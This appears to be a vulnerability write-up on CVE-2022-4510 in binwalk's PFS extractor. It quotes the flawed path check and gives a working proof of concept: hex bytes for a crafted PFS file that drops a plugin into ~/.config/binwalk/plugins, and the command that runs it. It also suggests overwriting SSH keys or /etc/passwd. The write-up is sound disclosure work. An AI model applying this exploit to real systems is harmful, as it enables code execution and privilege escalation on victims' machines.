Introduction
According to the official cve description, a path traversal vulnerability was found in binwalk from version 2.1.2 to 2.3.3. This vulnerability allows a remote attacker to execute arbitrary code on an affected machine with binwalk installed
What is a PFS file
A PFS file is a selection file created by PhotoFiltre Studio, an image retouching program. It contains the coordinates used by the image editor's polygon selection tool to draw lines between the given coordinates. PFS files are stored in plain text.
PFS file format
https://lekensteyn.nl/files/pfs/pfs.txt
Analyze source code
A PFS extractor plugin was merged into binwalk in 2017 with some modifications
def extractor(self, fname):
fname = os.path.abspath(fname)
out_dir = binwalk.core.common.unique_file_name(os.path.join(os.path.dirname(fname), "pfs-root"))
try:
with PFS(fname) as fs: #读取pfs文件数据
data = open(fname, 'rb')
data = binwalk.core.common.BlockFile(fname, 'rb')
data.seek(fs.get_end_of_meta_data())
for entry in fs.entries():
outfile_path = os.path.join(out_dir, entry.fname)
if not outfile_path.startswith(out_dir):
binwalk.core.common.warning("Unpfs extractor detected directory traversal attempt for file: '%s'. Refusing to extract." % outfile_path)
else:
self._create_dir_from_fname(outfile_path)
outfile = binwalk.core.common.BlockFile(outfile_path, 'wb')
outfile.write(data.read(entry.fsize))
outfile.close()
data.close()
except KeyboardInterrupt as e:
raise e
The problem occurs in the os.path.join function, because the code on line 11 does not fully resolve the path, so the condition on line 12 will never be true
By making a path-traversal PFS file we can force binwalk to write files outside of the directory
POC
Users can use the binwalk API to define their own plugins, just put the plugins in the $HOME/.config/binwalk/plugins/ directory, and then the plugins will be called when binwalk is run
Malicious code:
import binwalk.core.plugin
class MaliciousExtractor(binwalk.core.plugin.Plugin):
def init(self):
print("baimao")
Open the file with winhex after saving
Paste the following hexadecimal data directly
5046 532f 302e 3900 0000 0000 0000 0100
2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967
2f62 696e 7761 6c6b 2f70 6c75 6769 6e73
2f6d 616c 7761 6c6b 2e70 7900 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
3412 0000 a000 0000 c100 0000
Save the .py as a .pfs file and add it to the compressed package
When using binwalk to extract files from the user's home directory, a plugin will be added to .config/binwalk/plugins, and this malicious plugin will then be loaded and executed by binwalk, resulting in RCE
cd ~
binwalk -M -e exp.zip
successfully executed code
Summarize
The details of the cve were disclosed on January 31 this year. After studying it, in addition to overwriting the ./.config/binwalk/plugins/malwalk.py file, we can also overwrite the id.rsa or /etc/passwd file to directly escalate rights
Reference documents:
https://nvd.nist.gov/vuln/detail/CVE-2022-4510
https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk